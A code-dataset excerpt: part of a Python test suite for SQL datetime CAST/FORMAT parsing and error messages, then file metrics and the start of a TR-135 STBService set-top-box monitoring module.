"timestamp FORMAT 'YYYY-MM-DDtHH24:MI:SSZ')")
assert result.data == ["2018-11-08 15:11:04"]
# Format path
result = self.client.execute("select cast(cast('2018-11-10 15:11:04' as "
"timestamp) as string format 'YYYY-MM-DDTHH24:MI:SSZ')")
assert result.data == ["2018-11-10T15:11:04Z"]
def test_lowercase_format_elements(self):
result = self.client.execute("select cast('2019-11-20 15:59:44.123456789 01:01' as "
"timestamp format 'yyyy-mm-dd hh24:mi:ss.ff9 tzh-tzm')")
assert result.data == ["2019-11-20 15:59:44.123456789"]
result = self.client.execute("select cast('2019-300 15:59:44.123456789 01:01' as "
"timestamp format 'yyyy-ddd hh24:mi:ss.ff9 tzh-tzm')")
assert result.data == ["2019-10-27 15:59:44.123456789"]
result = self.client.execute("select cast('2019-11-21 11:59:44.123456789 p.m. 01:01' "
"as timestamp format 'yyyy-mm-dd hh12:mi:ss.ff9 am tzh-tzm')")
assert result.data == ["2019-11-21 23:59:44.123456789"]
result = self.client.execute("select cast('2019-11-22 10000.123456789 02:02' "
"as timestamp format 'yyyy-mm-dd sssss ff9 tzh-tzm')")
assert result.data == ["2019-11-22 02:46:40.123456789"]
def test_year(self):
# Test lower boundary of year
result = self.client.execute("select cast('1399-05-01' as "
"timestamp FORMAT 'YYYY-MM-DD')")
assert result.data == ["NULL"]
# YYYY with less than 4 digits in the input
query_options = dict({'now_string': '2019-01-01 11:11:11'})
result = self.execute_query("select cast('095-01-31' as "
"timestamp FORMAT 'YYYY-MM-DD')", query_options)
assert result.data == ["2095-01-31 00:00:00"]
result = self.execute_query("select cast('95-02-28' as "
"timestamp FORMAT 'YYYY-MM-DD')", query_options)
assert result.data == ["2095-02-28 00:00:00"]
result = self.execute_query("select cast('5-03-31' as "
"timestamp FORMAT 'YYYY-MM-DD')", query_options)
assert result.data == ["2015-03-31 00:00:00"]
# YYY with less than 3 digits in the input
result = self.execute_query("select cast('95-04-30' as "
"timestamp FORMAT 'YYY-MM-DD')", query_options)
assert result.data == ["2095-04-30 00:00:00"]
result = self.execute_query("select cast('5-05-31' as "
"timestamp FORMAT 'YYY-MM-DD')", query_options)
assert result.data == ["2015-05-31 00:00:00"]
# YY with 1 digits in the input
result = self.execute_query("select cast('5-06-30' as "
"timestamp FORMAT 'YY-MM-DD')", query_options)
assert result.data == ["2015-06-30 00:00:00"]
# YYY, YY, Y tokens without separators
result = self.execute_query("select cast('0950731' as "
"timestamp FORMAT 'YYYMMDD')", query_options)
assert result.data == ["2095-07-31 00:00:00"]
result = self.execute_query("select cast('950831' as "
"timestamp FORMAT 'YYMMDD')", query_options)
assert result.data == ["2095-08-31 00:00:00"]
result = self.execute_query("select cast('50930' as "
"timestamp FORMAT 'YMMDD')", query_options)
assert result.data == ["2015-09-30 00:00:00"]
# Timestamp to string formatting
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format 'YYYY')", query_options)
assert result.data == ["2019"]
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format 'YYY')", query_options)
assert result.data == ["019"]
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format 'YY')", query_options)
assert result.data == ["19"]
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format 'Y')", query_options)
assert result.data == ["9"]
def test_round_year(self):
query_options = dict({'now_string': '2019-01-01 11:11:11'})
# Test lower boundar of round year
result = self.client.execute("select cast('1399-05-01' as "
"timestamp FORMAT 'RRRR-MM-DD')")
assert result.data == ["NULL"]
result = self.client.execute("select cast('1400-05-21' as "
"timestamp FORMAT 'RRRR-MM-DD')")
assert result.data == ["1400-05-21 00:00:00"]
# RRRR with 4-digit year falls back to YYYY
result = self.execute_query("select cast('2017-05-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["2017-05-31 00:00:00"]
# RRRR with 3-digit year fills digits from current year
result = self.execute_query("select cast('017-01-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["2017-01-31 00:00:00"]
# RRRR wit 1-digit year fills digits from current year
result = self.execute_query("select cast('0-07-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["2010-07-31 00:00:00"]
# RR with 1-digit year fills digits from current year
result = self.execute_query("select cast('9-08-31' as "
"timestamp FORMAT 'RR-MM-DD')", query_options)
assert result.data == ["2019-08-31 00:00:00"]
# Round year when last 2 digits of current year is less than 50
query_options = dict({'now_string': '2049-01-01 11:11:11'})
result = self.execute_query("select cast('49-03-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["2049-03-31 00:00:00"]
result = self.execute_query("select cast('50-03-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["1950-03-31 00:00:00"]
query_options = dict({'now_string': '2000-01-01 11:11:11'})
result = self.execute_query("select cast('49-03-31' as "
"timestamp FORMAT 'RR-MM-DD')", query_options)
assert result.data == ["2049-03-31 00:00:00"]
result = self.execute_query("select cast('50-03-31' as "
"timestamp FORMAT 'RR-MM-DD')", query_options)
assert result.data == ["1950-03-31 00:00:00"]
# Round year when last 2 digits of current year is greater than 49
query_options = dict({'now_string': '2050-01-01 11:11:11'})
result = self.execute_query("select cast('49-03-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["2149-03-31 00:00:00"]
result = self.execute_query("select cast('50-03-31' as "
"timestamp FORMAT 'RRRR-MM-DD')", query_options)
assert result.data == ["2050-03-31 00:00:00"]
query_options = dict({'now_string': '2099-01-01 11:11:11'})
result = self.execute_query("select cast('49-03-31' as "
"timestamp FORMAT 'RR-MM-DD')", query_options)
assert result.data == ["2149-03-31 00:00:00"]
result = self.execute_query("select cast('50-03-31' as "
"timestamp FORMAT 'RR-MM-DD')", query_options)
assert result.data == ["2050-03-31 00:00:00"]
# In a datetime to sting cast round year act like regular 'YYYY' or 'YY' tokens.
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format 'RRRR')", query_options)
assert result.data == ["2019"]
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format 'RR')", query_options)
assert result.data == ["19"]
def test_day_in_year(self):
# Test "day in year" token in a non leap year scenario
result = self.execute_query("select cast('2019 1' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2019-01-01 00:00:00"]
result = self.execute_query("select cast('2019 31' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2019-01-31 00:00:00"]
result = self.execute_query("select cast('2019 32' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2019-02-01 00:00:00"]
result = self.execute_query("select cast('2019 60' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2019-03-01 00:00:00"]
result = self.execute_query("select cast('2019 365' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2019-12-31 00:00:00"]
result = self.execute_query("select cast('2019 366' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["NULL"]
# Test "day in year" token in a leap year scenario
result = self.execute_query("select cast('2000 60' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2000-02-29 00:00:00"]
result = self.execute_query("select cast('2000 61' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2000-03-01 00:00:00"]
result = self.execute_query("select cast('2000 366' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["2000-12-31 00:00:00"]
result = self.execute_query("select cast('2000 367' as timestamp FORMAT 'YYYY DDD')")
assert result.data == ["NULL"]
# Test "day in year" token without separators
result = self.execute_query("select cast('20190011120' as timestamp "
"FORMAT 'YYYYDDDHH12MI')")
assert result.data == ["2019-01-01 11:20:00"]
# Timestamp to string formatting
result = self.execute_query("select cast(cast('2019-01-01' as timestamp) as string "
"format'DDD')")
assert result.data == ["001"]
result = self.execute_query("select cast(cast('2019-12-31' as timestamp) as string "
"format'DDD')")
assert result.data == ["365"]
result = self.execute_query("select cast(cast('2000-12-31' as timestamp) as string "
"format'DDD')")
assert result.data == ["366"]
result = self.execute_query("select cast(cast('2019 123' as timestamp "
"format 'YYYY DDD') as string format'DDD')")
assert result.data == ["123"]
def test_second_of_day(self):
# Check boundaries
result = self.client.execute("select cast('2019-11-10 86399.11' as "
"timestamp FORMAT 'YYYY-MM-DD SSSSS.FF2')")
assert result.data == ["2019-11-10 23:59:59.110000000"]
result = self.client.execute("select cast('2019-11-10 0' as "
"timestamp FORMAT 'YYYY-MM-DD SSSSS')")
assert result.data == ["2019-11-10 00:00:00"]
# Without separators full 5-digit "second of day" has to be given
result = self.client.execute("select cast('11-10 036612019' as "
"timestamp FORMAT 'MM-DD SSSSSYYYY')")
assert result.data == ["2019-11-10 01:01:01"]
# Check timezone offsets with "second of day"
result = self.client.execute("select cast('2019-11-10 036611010' as "
"timestamp FORMAT 'YYYY-MM-DD SSSSSTZHTZM')")
assert result.data == ["2019-11-10 01:01:01"]
# Timestamp to string formatting
result = self.client.execute("select cast(cast('2019-01-01 01:01:01' as timestamp) "
"as string format 'SSSSS')")
assert result.data == ["03661"]
result = self.client.execute("select cast(cast('2019-01-01' as timestamp) as string "
"format 'SSSSS')")
assert result.data == ["00000"]
result = self.client.execute("select cast(cast('2019-01-01 23:59:59' as timestamp) "
"as string format 'SSSSS')")
assert result.data == ["86399"]
def test_fraction_seconds(self):
result = self.execute_query("select cast('2019-11-08 123456789' as "
"timestamp FORMAT 'YYYY-MM-DD FF9')")
assert result.data == ["2019-11-08 00:00:00.123456789"]
result = self.execute_query("select cast('2019-11-08 1' as "
"timestamp FORMAT 'YYYY-MM-DD FF')")
assert result.data == ["2019-11-08 00:00:00.100000000"]
result = self.execute_query("select cast('2019-11-08 1234567890' as "
"timestamp FORMAT 'YYYY-MM-DD FF')")
assert result.data == ["NULL"]
result = self.execute_query("select cast('2019-11-08' as "
"timestamp FORMAT 'YYYY-MM-DD FF')")
assert result.data == ["NULL"]
self.run_fraction_test(1)
self.run_fraction_test(2)
self.run_fraction_test(3)
self.run_fraction_test(4)
self.run_fraction_test(5)
self.run_fraction_test(6)
self.run_fraction_test(7)
self.run_fraction_test(8)
self.run_fraction_test(9)
def run_fraction_test(self, length):
MAX_LENGTH = 9
fraction_part = ""
for x in range(length):
fraction_part += str(x + 1)
template_input = "select cast('2019-11-08 %s' as timestamp FORMAT 'YYYY-MM-DD FF%s')"
input_str = template_input % (fraction_part, length)
expected = "2019-11-08 00:00:00." + fraction_part + ("0" * (MAX_LENGTH - length))
result = self.execute_query(input_str)
assert result.data == [expected]
input2_str = template_input % (fraction_part + str(length + 1), length)
result = self.execute_query(input2_str)
assert result.data == ["NULL"]
def test_meridiem_indicator(self):
# Check 12 hour diff between AM and PM
result = self.client.execute("select cast('2017-05-03 08 AM' as "
"timestamp FORMAT 'YYYY-MM-DD HH12 AM')")
assert result.data == ["2017-05-03 08:00:00"]
result = self.client.execute("select cast('2017-05-04 08 PM' as "
"timestamp FORMAT 'YYYY-MM-DD HH12 PM')")
assert result.data == ["2017-05-04 20:00:00"]
# Check that any meridiem indicator in the pattern matches any meridiem indicator in
# the input
result = self.client.execute("select cast('2017-05-05 12AM' as "
"timestamp FORMAT 'YYYY-MM-DD HH12PM')")
assert result.data == ["2017-05-05 00:00:00"]
result = self.client.execute("select cast('2017-05-06 P.M.12' as "
"timestamp FORMAT 'YYYY-MM-DD AMHH12')")
assert result.data == ["2017-05-06 12:00:00"]
result = self.client.execute("select cast('2017-05-07 PM 01' as "
"timestamp FORMAT 'YYYY-MM-DD A.M. HH12')")
assert result.data == ["2017-05-07 13:00:00"]
# Test lowercase indicator in input
result = self.client.execute("select cast('2017-05-08 pm09' as "
"timestamp FORMAT 'YYYY-MM-DD P.M.HH12')")
assert result.data == ["2017-05-08 21:00:00"]
result = self.client.execute("select cast('2017-05-09 10a.m.' as "
"timestamp FORMAT 'YYYY-MM-DD HH12PM')")
assert result.data == ["2017-05-09 10:00:00"]
# Test that '.' in indicator doesn't conflict with '.' as separator
result = self.client.execute("select cast('2017-05-11 9.AM.10' as "
"timestamp FORMAT 'YYYY-MM-DD HH12.P.M..MI')")
assert result.data == ["2017-05-11 09:10:00"]
result = self.client.execute("select cast('2017-05-10.P.M..10' as "
"timestamp FORMAT 'YYYY-MM-DD.AM.HH12')")
assert result.data == ["2017-05-10 22:00:00"]
# Timestamp to string formatting
result = self.client.execute("select cast(cast('2019-01-01 00:15:10' as timestamp) "
"as string format 'HH12 P.M.')")
assert result.data == ["12 A.M."]
result = self.client.execute("select cast(cast('2019-01-01 12:15:10' as timestamp) "
"as string format 'HH12 AM')")
assert result.data == ["12 PM"]
result = self.client.execute("select cast(cast('2019-01-01 13:15:10' as timestamp) "
"as string format 'HH12 a.m.')")
assert result.data == ["01 p.m."]
result = self.client.execute("select cast(cast('2019-01-01 23:15:10' as timestamp) "
"as string format 'HH12 p.m.')")
assert result.data == ["11 p.m."]
def test_timezone_offsets(self):
# Test positive timezone offset.
result = self.client.execute("select cast('2018-01-01 10:00 AM +15:59' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M. TZH:TZM')")
assert result.data == ["2018-01-01 10:00:00"]
# Test negative timezone offset.
result = self.client.execute("select cast('2018-12-31 08:00 PM -15:59' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M. TZH:TZM')")
assert result.data == ["2018-12-31 20:00:00"]
# Minus sign before TZM.
result = self.client.execute("select cast('2018-12-31 08:00 AM 01:-59' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M. TZH:TZM')")
assert result.data == ["2018-12-31 08:00:00"]
# Minus sign right before one digit TZH.
result = self.client.execute("select cast('2018-12-31 08:00 AM--1:10' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M. TZH:TZM')")
assert result.data == ["2018-12-31 08:00:00"]
result = self.client.execute("select cast('2018-12-31 08:00 AM-5:00' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M.TZH:TZM')")
assert result.data == ["2018-12-31 08:00:00"]
# One digit negative TZH at the end of the input string.
result = self.client.execute("select cast('2018-12-31 12:01 -1' as timestamp "
"FORMAT 'YYYY-MM-DD HH24:MI TZH')")
assert result.data == ["2018-12-31 12:01:00"]
# Test timezone offset parsing without separators
result = self.client.execute("select cast('201812310800AM+0515' as "
"timestamp FORMAT 'YYYYMMDDHH12MIA.M.TZHTZM')")
assert result.data == ["2018-12-31 08:00:00"]
result = self.client.execute("select cast('201812310800AM0515' as "
"timestamp FORMAT 'YYYYMMDDHH12MIA.M.TZHTZM')")
assert result.data == ["2018-12-31 08:00:00"]
result = self.client.execute("select cast('201812310800AM-0515' as "
"timestamp FORMAT 'YYYYMMDDHH12MIA.M.TZHTZM')")
assert result.data == ["2018-12-31 08:00:00"]
# Test signed zero TZH with not null TZM
result = self.client.execute("select cast('2018-01-01 10:00 AM +00:59' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M. TZH:TZM')")
assert result.data == ["2018-01-01 10:00:00"]
result = self.client.execute("select cast('2018-01-01 10:00 AM -00:59' as "
"timestamp FORMAT 'YYYY-MM-DD HH12:MI A.M. TZH:TZM')")
assert result.data == ["2018-01-01 10:00:00"]
# Shuffle TZH and TZM into other elements
result = self.client.execute("select cast('2018-01-01 15 10:00 1 AM' as "
"timestamp FORMAT 'YYYY-MM-DD TZM HH12:MI TZH A.M.')")
assert result.data == ["2018-01-01 10:00:00"]
result = self.client.execute("select cast('2018-01-011510:00-01AM' as "
"timestamp FORMAT 'YYYY-MM-DDTZMHH12:MITZHA.M.')")
assert result.data == ["2018-01-01 10:00:00"]
# Timezone offset with default time
result = self.client.execute("select cast('2018-01-01 01:30' as timestamp "
"FORMAT 'YYYY-MM-DD TZH:TZM')")
assert result.data == ["2018-01-01 00:00:00"]
# Single minus sign before two digit TZH.
result = self.client.execute("select cast('2018-09-11 15:30:10-10' as timestamp "
"FORMAT 'YYYY-MM-DD HH24:MI:SS-TZH')")
assert result.data == ["2018-09-11 15:30:10"]
# Non-digit TZH and TZM.
result = self.client.execute("select cast('2018-09-11 17:30:10 ab:10' as timestamp "
"FORMAT 'YYYY-MM-DD HH24:MI:SS TZH:TZM')")
assert result.data == ["NULL"]
result = self.client.execute("select cast('2018-09-11 17:30:10 -ab:10' as timestamp "
"FORMAT 'YYYY-MM-DD HH24:MI:SS TZH:TZM')")
assert result.data == ["NULL"]
result = self.client.execute("select cast('2018-09-11 17:30:10 +ab:10' as timestamp "
"FORMAT 'YYYY-MM-DD HH24:MI:SS TZH:TZM')")
assert result.data == ["NULL"]
result = self.client.execute("select cast('2018-09-11 18:30:10 10:ab' as timestamp "
"FORMAT 'YYYY-MM-DD HH24:MI:SS TZH:TZM')")
assert result.data == ["NULL"]
def test_format_parse_errors(self):
# Invalid format
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'XXXX-dd-MM')")
assert "Bad date/time conversion format: XXXX-dd-MM" in str(err)
# Invalid use of SimpleDateFormat
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01 15:10' as timestamp format 'yyyy-MM-dd +hh:mm')")
assert "Bad date/time conversion format: yyyy-MM-dd +hh:mm" in str(err)
# Duplicate format element
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD MM')")
assert "Invalid duplication of format element" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD-YYYY')")
assert "Invalid duplication of format element" in str(err)
# Multiple year token provided
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD-YY')")
assert "Multiple year token provided" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYY-MM-DD-Y')")
assert "Multiple year token provided" in str(err)
# Year and round year conflict
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YY-MM-DD-RRRR')")
assert "Both year and round year are provided" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'RR-MM-DD-YYY')")
assert "Both year and round year are provided" in str(err)
# Day of year conflict
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DDD')")
assert "Day of year provided with day or month token" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-DD-DDD')")
assert "Day of year provided with day or month token" in str(err)
# Conflict between hour tokens
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD HH:HH24')")
assert "Multiple hour tokens provided" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD HH12:HH24')")
assert "Multiple hour tokens provided" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD HH12:HH')")
assert "Multiple hour tokens provided" in str(err)
# Conflict with median indicator
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD AM HH:MI A.M.')")
assert "Multiple median indicator tokens provided" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD PM HH:MI am')")
assert "Multiple median indicator tokens provided" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD HH24:MI a.m.')")
assert "Conflict between median indicator and hour token" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD p.m.')")
assert "Missing hour token" in str(err)
# Conflict with second of day
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD SSSSS HH')")
assert "Second of day token conflicts with other token(s)" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD HH12:SSSSS')")
assert "Second of day token conflicts with other token(s)" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD HH24SSSSS')")
assert "Second of day token conflicts with other token(s)" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD MI SSSSS')")
assert "Second of day token conflicts with other token(s)" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD SS SSSSS')")
assert "Second of day token conflicts with other token(s)" in str(err)
# Too long format
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format '" +
"{char: <101}".format(char="s") + "')")
assert "The input format is too long" in str(err)
# Timezone offsets in a datetime to string formatting
err = self.execute_query_expect_failure(self.client,
"select cast(cast('2017-05-01 01:15' as timestamp format 'YYYY-MM-DD TZH:TZM') "
"as string format 'TZH')")
assert "Timezone offset not allowed in a datetime to string conversion" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast(cast('2017-05-01 01:15' as timestamp format 'YYYY-MM-DD TZH:TZM') "
"as string format 'TZM')")
assert "Timezone offset not allowed in a datetime to string conversion" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast(cast('2017-05-01 01:15' as timestamp format 'YYYY-MM-DD TZH:TZM') "
"as string format 'YYYY-MM-DD HH24:MI:SS TZH:TZM')")
assert "Timezone offset not allowed in a datetime to string conversion" in str(err)
# TZM requires TZH
err = self.execute_query_expect_failure(self.client,
"select cast('2018-12-31 08:00 AM 59' as timestamp FORMAT "
"'YYYY-MM-DD HH12:MI A.M. TZM')")
assert "TZH token is required for TZM" in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2018-12-31 08:00 AM -59' as timestamp FORMAT "
"'YYYY-MM-DD HH12:MI A.M. TZM')")
assert "TZH token is required for TZM" in str(err)
# Multiple fraction second token conflict
err = self.execute_query_expect_failure(self.client,
"select cast('2018-10-10' as timestamp format 'FF FF1')")
assert "Multiple fractional second token provided." in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2018-10-10' as timestamp format 'FF2 FF3')")
assert "Multiple fractional second token provided." in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2018-10-10' as timestamp format 'FF4 FF5')")
assert "Multiple fractional second token provided." in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2018-10-10' as timestamp format 'FF6 FF7')")
assert "Multiple fractional second token provided." in str(err)
err = self.execute_query_expect_failure(self.client,
"select cast('2018-10-10' as timestamp format 'FF8 FF9')")
assert "Multiple fractional second token provided." in str(err)
# Verify that conflict check is not skipped when format ends with separators.
err = self.execute_query_expect_failure(self.client,
"select cast('2017-05-01' as timestamp format 'YYYY-MM-DD-RR--')")
assert "Both year and round year are provided" in str(err)
| 44.649864 | 90 | 0.665487 | 5,017 | 32,773 | 4.291808 | 0.084911 | 0.06827 | 0.09869 | 0.083875 | 0.787108 | 0.753019 | 0.719998 | 0.684191 | 0.642346 | 0.572265 | 0 | 0.12239 | 0.191987 | 32,773 | 733 | 91 | 44.710778 | 0.690722 | 0.112349 | 0 | 0.391837 | 0 | 0.061224 | 0.485122 | 0.039548 | 0 | 0 | 0 | 0 | 0.302041 | 1 | 0.030612 | false | 0 | 0.004082 | 0.002041 | 0.038776 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
828881fde9703d9673ead5020b75557c9e764a38 | 27,268 | py | Python | platform/gfmedia/stbservice.py | DentonGentry/gfiber-catawampus | b01e4444f3c7f12b1af7837203b37060fd443bb7 | [
"Apache-2.0"
] | 2 | 2017-10-03T16:06:29.000Z | 2020-09-08T13:03:13.000Z | platform/gfmedia/stbservice.py | DentonGentry/gfiber-catawampus | b01e4444f3c7f12b1af7837203b37060fd443bb7 | [
"Apache-2.0"
] | null | null | null | platform/gfmedia/stbservice.py | DentonGentry/gfiber-catawampus | b01e4444f3c7f12b1af7837203b37060fd443bb7 | [
"Apache-2.0"
] | 1 | 2017-05-07T17:39:02.000Z | 2017-05-07T17:39:02.000Z | #!/usr/bin/python
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TR-069 has mandatory attribute names that don't comply with policy
# pylint:disable=invalid-name
"""Implementation of tr-135 STBService."""
__author__ = 'dgentry@google.com (Denton Gentry)'
import datetime
import glob
import json
import re
import socket
import struct
import time
import tornado.ioloop
import tr.core
import tr.cwmpdate
import tr.cwmptypes
import tr.session
import tr.tr135_v1_2
import tr.x_catawampus_videomonitoring_1_0 as vmonitor
BASE135STB = tr.tr135_v1_2.STBService_v1_2.STBService
CATA135STB = vmonitor.X_CATAWAMPUS_ORG_STBVideoMonitoring_v1_0.STBService
CATA135STBTOTAL = CATA135STB.ServiceMonitoring.MainStream.Total
IGMPREGEX = re.compile(r'^\s+(\S+)\s+\d\s+\d:[0-9A-Fa-f]+\s+\d')
IGMP6REGEX = re.compile((r'^\d\s+\S+\s+([0-9A-Fa-f]{32})\s+\d\s+[0-9A-Fa-f]'
r'+\s+\d'))
PROCNETIGMP = '/proc/net/igmp'
PROCNETIGMP6 = '/proc/net/igmp6'
PROCNETUDP = '/proc/net/udp'
CONT_MONITOR_FILES = [
'/tmp/cwmp/monitoring/ts/tr_135_total_tsstats%d.json',
'/tmp/cwmp/monitoring/dejittering/tr_135_total_djstats%d.json',
'/tmp/cwmp/monitoring/dejittering/tr_135_total_decoderstats%d.json',
'/tmp/cwmp/monitoring/tcp/tr_135_total_tcpstats%d.json',
]
EPG_STATS_FILES = ['/tmp/cwmp/monitoring/epg/tr_135_epg_stats*.json']
HDMI_STATS_FILE = '/tmp/cwmp/monitoring/hdmi/tr_135_hdmi_stats*.json'
HDMI_DISPLAY_DEVICE_STATS_FILES = [
'/tmp/cwmp/monitoring/hdmi/tr_135_dispdev_status*.json',
'/tmp/cwmp/monitoring/hdmi/tr_135_dispdev_stats*.json']
TIMENOW = time.time
def UnpackAlanCoxIP(packed):
"""Convert hex IP addresses to strings.
/proc/net/igmp and /proc/net/udp both contain IP addresses printed as
a hex string, _without_ calling ntohl() first.
Example from /proc/net/udp on a little endian machine:
sl local_address rem_address st tx_queue rx_queue ...
464: 010002E1:07D0 00000000:0000 07 00000000:00000000 ...
On a big-endian machine:
sl local_address rem_address st tx_queue rx_queue ...
464: E1020001:07D0 00000000:0000 07 00000000:00000000 ...
Args:
packed: the hex thingy.
Returns:
A conventional dotted quad IP address encoding.
"""
return socket.inet_ntop(socket.AF_INET, struct.pack('=L', int(packed, 16)))
class STBService(BASE135STB):
"""STBService.{i}."""
def __init__(self, ioloop=None):
super(STBService, self).__init__()
self.Unexport(['Alias', 'Enable'])
self.Unexport(objects=['AVPlayers', 'AVStreams', 'Applications',
'Capabilities'])
self.Export(objects=['X_CATAWAMPUS-ORG_ProgramMetadata'])
self.ServiceMonitoring = ServiceMonitoring(ioloop=ioloop)
self.Components = Components()
self.X_CATAWAMPUS_ORG_ProgramMetadata = ProgMetadata()
class Components(BASE135STB.Components):
"""STBService.{i}.Components."""
def __init__(self):
super(Components, self).__init__()
self.Unexport(['AudioDecoderNumberOfEntries', 'AudioOutputNumberOfEntries',
'CANumberOfEntries', 'DRMNumberOfEntries',
'SCARTNumberOfEntries', 'SPDIFNumberOfEntries',
'VideoDecoderNumberOfEntries', 'VideoOutputNumberOfEntries'])
self.Unexport(objects=['PVR'])
self.Unexport(lists=['AudioDecoder', 'AudioOutput', 'CA', 'DRM', 'SCART',
'SPDIF', 'VideoDecoder', 'VideoOutput'])
self.FrontEndList = {'1': FrontEnd()}
self.HDMIList = {'1': HDMI()}
@property
def FrontEndNumberOfEntries(self):
return len(self.FrontEndList)
@property
def HDMINumberOfEntries(self):
return len(self.HDMIList)
class FrontEnd(BASE135STB.Components.FrontEnd):
"""STBService.{i}.Components.FrontEnd.{i}."""
def __init__(self):
super(FrontEnd, self).__init__()
self.Unexport(['Alias', 'Enable', 'Name', 'Status'])
self.Unexport(objects=['DVBT'])
self.IP = IP()
class IP(BASE135STB.Components.FrontEnd.IP):
"""STBService.{i}.Components.FrontEnd.{i}.IP."""
def __init__(self):
super(IP, self).__init__()
self.Unexport(['ActiveInboundIPStreams', 'ActiveOutboundIPStreams',
'InboundNumberOfEntries', 'OutboundNumberOfEntries'])
self.Unexport(objects=['Dejittering', 'RTCP', 'RTPAVPF', 'ServiceConnect',
'FEC', 'ForceMonitor'])
self.Unexport(lists=['Inbound', 'Outbound'])
self.IGMP = IGMP()
class IGMP(BASE135STB.Components.FrontEnd.IP.IGMP):
"""STBService.{i}.Components.FrontEnd.{i}.IP.IGMP."""
def __init__(self):
super(IGMP, self).__init__()
self.Unexport(['ClientGroupStatsNumberOfEntries', 'ClientRobustness',
'ClientUnsolicitedReportInterval', 'ClientVersion',
'DSCPMark', 'Enable', 'EthernetPriorityMark',
'LoggingEnable', 'MaximumNumberOfConcurrentGroups',
'MaximumNumberOfTrackedGroups', 'Status', 'VLANIDMark'])
self.Unexport(lists=['ClientGroupStats'])
self._ClientGroups = dict()
self.ClientGroupList = tr.core.AutoDict(
'ClientGroupList', iteritems=self.IterClientGroups,
getitem=self.GetClientGroupByIndex)
@property
def ClientGroupNumberOfEntries(self):
